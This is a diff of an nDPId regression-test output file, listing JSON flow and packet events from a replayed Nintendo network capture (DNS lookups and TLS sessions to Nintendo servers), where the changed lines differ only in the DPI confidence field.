00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1500731326644,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1500731326644,"pkt":"AA6OGXEMfLuKifuECABFAAA8EXNAAEAGCZbAqAxyNsAb2aItAbvSLGpEAAAAAKACgABWsQAAAgQFUAEDAwYEAggKABpxjAAAAAA="} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1500731326676,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1500731326676,"pkt":"fLuKifuEAA6OGXEMCABFAAA8AABAAPUGZgg2wBvZwKgMcgG7oi3AHA3T0ixqRaAScSCE4wAAAgQFrAQCCAqn0Wp9ABpxjAEDAwg="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1500731326680,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1500731326680,"pkt":"AA6OGXEMfLuKifuECABFAAA0EXRAAEAGCZ3AqAxyNsAb2aItAbvSLGpFwBwN1IAQAg4imAAAAQEICgAaca+n0Wp9"} -00994{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1500731326644,"flow_last_seen":1500731326686,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1500731326686,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01051{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":96,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1500731326644,"flow_last_seen":1500731326729,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1500731326729,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01368{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":97,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1500731326644,"flow_last_seen":1500731326731,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":2908,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":1500731326731,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","server_names":"*.baas.nintendo.com,baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=JP, ST=Kyoto, L=Minami-ku, O=Nintendo Co., Ltd., CN=*.baas.nintendo.com","fingerprint":"8A:0A:1D:D3:A8:96:7A:55:C5:75:B2:2B:3E:45:15:54:0A:B0:FC:94"}} +00994{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1500731326644,"flow_last_seen":1500731326686,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1500731326686,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01051{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":96,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1500731326644,"flow_last_seen":1500731326729,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1500731326729,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01368{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":97,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1500731326644,"flow_last_seen":1500731326731,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":2908,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":1500731326731,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","server_names":"*.baas.nintendo.com,baas.nintendo.com","ja3":"200a99534ce50d35cf40cc3cce4c69b5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=JP, ST=Kyoto, L=Minami-ku, O=Nintendo Co., Ltd., CN=*.baas.nintendo.com","fingerprint":"8A:0A:1D:D3:A8:96:7A:55:C5:75:B2:2B:3E:45:15:54:0A:B0:FC:94"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731329336,"flow_last_seen":1500731329336,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1500731329336,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.146.242.74","src_port":11534,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1500731329336,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1500731329336,"pkt":"AA6OGXEMfLuKifuECABFAAAoEX5AAEAGM1vAqAxyNpLySi0OAbv6FA+Od8xLzVAQEsCrFwAA"} 
00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1500731329520,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1500731329520,"pkt":"fLuKifuEAA6OGXEMCABFAAAo9shAACwGYhA2kvJKwKgMcgG7LQ53zEvN+hQPj1AQn2AedgAA"} 
@@ -56,79 +56,79 @@ 00526{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1500731340946,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1500731340946,"pkt":"AA6OGXEMfLuKifuECABFAABcEY4AAEARLg7AqAxyI55KPdprgjcASL\/4MquYZAEBAADlTwAACP0AEAAAAAAAZU1IBAAAAwAAAABOQVRUZXN0SWRfRHVtbXkAdr5X4NIRIiw3Gy5kQ0UkeA=="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":140,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731340951,"flow_last_seen":1500731340951,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1500731340951,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":10184,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1500731340951,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1500731340951,"pkt":"AA6OGXEMfLuKifuECABFAABOEY8AAEARz0zAqAxywKgMASfIADUAOkdJMLcBAAABAAAAAAAADWcyZGYzM2QwMS1scDEBcANzcnYIbmludGVuZG8DbmV0AAAcAAE="} 
-00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":140,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731340951,"flow_last_seen":1500731340951,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1500731340951,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":10184,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"g2df33d01-lp1.p.srv.nintendo.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":140,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731340951,"flow_last_seen":1500731340951,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1500731340951,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":10184,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"g2df33d01-lp1.p.srv.nintendo.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1500731340951,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1500731340951,"pkt":"fLuKifuEAA6OGXEMCABFAABON9pAAEARaQHAqAwBwKgMcgA1J8gAOsbIMLeBgAABAAAAAAAADWcyZGYzM2QwMS1scDEBcANzcnYIbmludGVuZG8DbmV0AAAcAAE="} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":141,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1500731340951,"flow_last_seen":1500731340951,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1500731340951,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":10184,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"g2df33d01-lp1.p.srv.nintendo.net","num_queries":1,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":141,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1500731340951,"flow_last_seen":1500731340951,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1500731340951,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":10184,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": 
{"query":"g2df33d01-lp1.p.srv.nintendo.net","num_queries":1,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1500731340956,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1500731340956,"pkt":"AA6OGXEMfLuKifuECABFAABOEZAAAEARz0vAqAxywKgMASfIADUAOpTc4z4BAAABAAAAAAAADWcyZGYzM2QwMS1scDEBcANzcnYIbmludGVuZG8DbmV0AAABAAE="} -00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":142,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1500731340951,"flow_last_seen":1500731340956,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1500731340956,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":10184,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"g2df33d01-lp1.p.srv.nintendo.net","num_queries":1,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00802{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":143,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1500731340951,"flow_last_seen":1500731340956,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1500731340956,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":10184,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"g2df33d01-lp1.p.srv.nintendo.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.10.205.177"}} +00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":142,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1500731340951,"flow_last_seen":1500731340956,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1500731340956,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":10184,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"g2df33d01-lp1.p.srv.nintendo.net","num_queries":1,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00802{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":143,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1500731340951,"flow_last_seen":1500731340956,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1500731340956,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":10184,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"g2df33d01-lp1.p.srv.nintendo.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.10.205.177"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":148,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731340981,"flow_last_seen":1500731340981,"flow_idle_time":200000,"flow_min_l4_payload_len":256,"flow_max_l4_payload_len":256,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1500731340981,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"52.10.205.177","src_port":55915,"dst_port":34343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00801{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1500731340981,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":298,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":298,"pkt_l4_len":264,"thread_ts_msec":1500731340981,"pkt":"AA6OGXEMfLuKifuECABFAAEcEZMAAEARmWjAqAxyNArNsdprhicBCL5GMquYZAEAAADlcwAACAAA0AAAAAAAZU1IgACGJwAAAAAPAPz\/AL\/\/\/\/\/\/\/\/\/\/\/\/\/\/DNhnHrgUDeqh96EJudpqr7HTWmwuyiNXAoN8EJ3L9Q9lPi1doyYlmiR\/kIBcOYNG3f6ClDHLwoaKdMh+FYL2YCHItfujH2Z4qGo8CMfrSTput8A2wWQpgkAxBIJe0WvlOjtOpz1+6kpnOg7dok0TGK81\/aeKZUUCJvuan8vMhErLm0XKEN1cWoDxH\/OLKVz5pN4b+BSPCYy59gluv93Pq8HtsFMIvC\/lWp43XhLEF2IUu226gZ0swWlxHUEiaoKOkMwyqhQOw2nawlxv1+4u7w=="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":151,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731341194,"flow_last_seen":1500731341194,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1500731341194,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":51035,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1500731341194,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1500731341194,"pkt":"AA6OGXEMfLuKifuECABFAABgEZUAAEARzzTAqAxywKgMAcdbADUATDXVYWkBAAABAAAAAAAAIGUwZDY3YzUwOWZiMjAzODU4ZWJjYjJmZTNmODhjMmFhBGJhYXMIbmludGVuZG8DY29tAAABAAE="} 
-00805{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731341194,"flow_last_seen":1500731341194,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1500731341194,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":51035,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00805{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731341194,"flow_last_seen":1500731341194,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1500731341194,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":51035,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1500731341194,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1500731341194,"pkt":"fLuKifuEAA6OGXEMCABFAAELN\/tAAEARaCPAqAwBwKgMcgA1x1sA9yl7YWmBgAABAAkAAAAAIGUwZDY3YzUwOWZiMjAzODU4ZWJjYjJmZTNmODhjMmFhBGJhYXMIbmludGVuZG8DY29tAAABAAHADAAFAAEAAAAPAB8OZDNmdGhwdnY3Znp4MDAKY2xvdWRmcm9udANuZXQAwFAAAQABAAAALQAENsAbCMBQAAEAAQAAAC0ABDbAG2jAUAABAAEAAAAtAAQ2wBuuwFAAAQABAAAALQAENsAbSsBQAAEAAQAAAC0ABDbAG1HAUAABAAEAAAAtAAQ2wBsnwFAAAQABAAAALQAENsAbxMBQAAEAAQAAAC0ABDbAG9k="} -00820{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":152,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1500731341194,"flow_last_seen":1500731341194,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1500731341194,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":51035,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.192.27.8"}} 
+00820{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":152,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1500731341194,"flow_last_seen":1500731341194,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1500731341194,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":51035,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"},"dns": {"query":"e0d67c509fb203858ebcb2fe3f88c2aa.baas.nintendo.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.192.27.8"}} 